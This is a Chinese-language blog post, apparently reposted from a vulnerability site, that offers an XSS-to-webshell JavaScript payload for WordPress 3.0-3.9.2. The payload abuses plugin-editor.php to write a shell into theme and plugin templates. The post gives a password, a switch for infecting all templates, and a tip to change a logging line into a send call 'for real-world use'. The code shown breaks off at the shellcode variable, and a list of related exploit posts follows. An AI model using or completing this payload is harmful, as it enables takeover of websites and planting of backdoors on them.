wordpress 3.0-3.9.2 XSS Getshell Payload

发表于 2014年12月01日
Vulndb

如果实战用记得把 console.lnfo 那一行该为发送喔。。。
密码：fuckxssQ
这个getshell js 有getshell当前模板跟getshell全部模板的功能
默认是getshell当前模板 StartGetshell = 0
如果要getshell全部插件模板把 StartGetshell的值改为1 即可

/* 
0x_Jin WordPress Getshell 
*/ 
var a = location.href.split('/'); 
var file = ""; 
var xurl = location.href.replace(a[a.length-1],"plugin-editor.php"); 
var file2 = []; 
var StartGetshell = 0; 
var shellcode = '

标签：wordpress漏洞原文连接：wordpress 3.0-3.9.2 XSS Getshell Payload 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

苹果商业模式【PHP版本】过狗Shell

WordPress Social Warfare插件XSS和RCE漏洞

WordPress Social Warfare插件XSS和RCE漏洞

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

WordPress 插件 Social Warfare<=3.5.2 RCE 漏洞

WordPress Multi Themes Arbitrary File Download Vulnerability

WordPress Multi Themes Arbitrary File Download Vulnerability

WordPress Gravity Forms 1.8.19 Shell Upload

WordPress Gravity Forms 1.8.19 Shell Upload

WordPress插件wp-catpro漏洞

WordPress插件wp-catpro漏洞

WordPress cformsII插件rs和rsargs参数脚本注入漏洞

WordPress cformsII插件rs和rsargs参数脚本注入漏洞

WordPress 3.0.1 wp-admin/plugins.php模块跨站脚本漏洞

WordPress 3.0.1 wp-admin/plugins.php模块跨站脚本漏洞

firestats插件引起的wordpress安全漏洞

firestats插件引起的wordpress安全漏洞

解决 the "listen ... http2" directive is deprecated

Prism：也许是目前理想的WordPress代码高亮方案

Prism：也许是目前理想的WordPress代码高亮方案

两个生成式AI 平台推荐，生产力亲测

两个生成式AI 平台推荐，生产力亲测

如何知道移动应用程序是否是使用 Flutter 制作的？

如何知道移动应用程序是否是使用 Flutter 制作的？

禁用WordPress 6.7 中延迟加载图像的自动调整大小

禁用WordPress 6.7 中延迟加载图像的自动调整大小

王慧文清华产品课

王慧文清华产品课

Mos macOS下平滑鼠标滚动/滚动方向小工具

Mos macOS下平滑鼠标滚动/滚动方向小工具

Flutter 中设置 Google Maps 样式深色模式

Flutter 中设置 Google Maps 样式深色模式